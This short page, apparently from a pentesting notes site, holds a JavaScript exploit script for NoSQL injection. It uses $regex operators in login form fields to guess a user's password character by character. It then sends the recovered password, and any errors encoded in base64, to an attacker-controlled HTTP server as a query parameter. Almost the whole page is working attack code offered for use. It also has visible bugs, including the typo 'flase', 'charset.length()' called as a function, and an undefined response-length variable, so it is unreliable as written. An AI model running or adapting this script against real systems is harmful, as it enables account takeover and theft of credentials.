NoSQL REGEX Password

// this is script is used to exploit nosql injection with regex to guess a password with known length

var req1 = new XMLHttpRequest();
var req2 = new XMLHttpRequest();

charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890`!@#$%^&*()-_=+[]{}|;:",.<>?/\\';
pw=''
pw_len = 12 // change this with the password length, If you don't know the pw length you can use the passwordlength.js script to figure it out


// guessing the password won't pass 32 chars or maybe it is a hash

try {
    for (i = 1; i<= pw_len; i++){
        for (j=1 ; j<= charset.length() ; j++){
            // this will 
            req1.open('POST','http://domain_name',flase);
            req1.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
            req1.send('email[$regex]=EXAMPLE@EXAMPLE.EXAMPLE&password[$regex]=^' + pw + charset[j] + '.*');
    
            if (req1.responseText.length == valid_req_length_value){
                pw += charset[j];
                break;   
            
            }
        }  
    }
    
} catch(e) {
    req1.open('GET',"http://my_HTTP_server_IP/?e=" + btoa(e), false);
    req1.send();
}


req2.open('GET',"http://my_HTTP_server_IP/?pw=" + pw, false);
req2.send();
PreviousNoSQL REGEX Password Length NextCreds BruteForce CSRF Handling
Last updated 2 years ago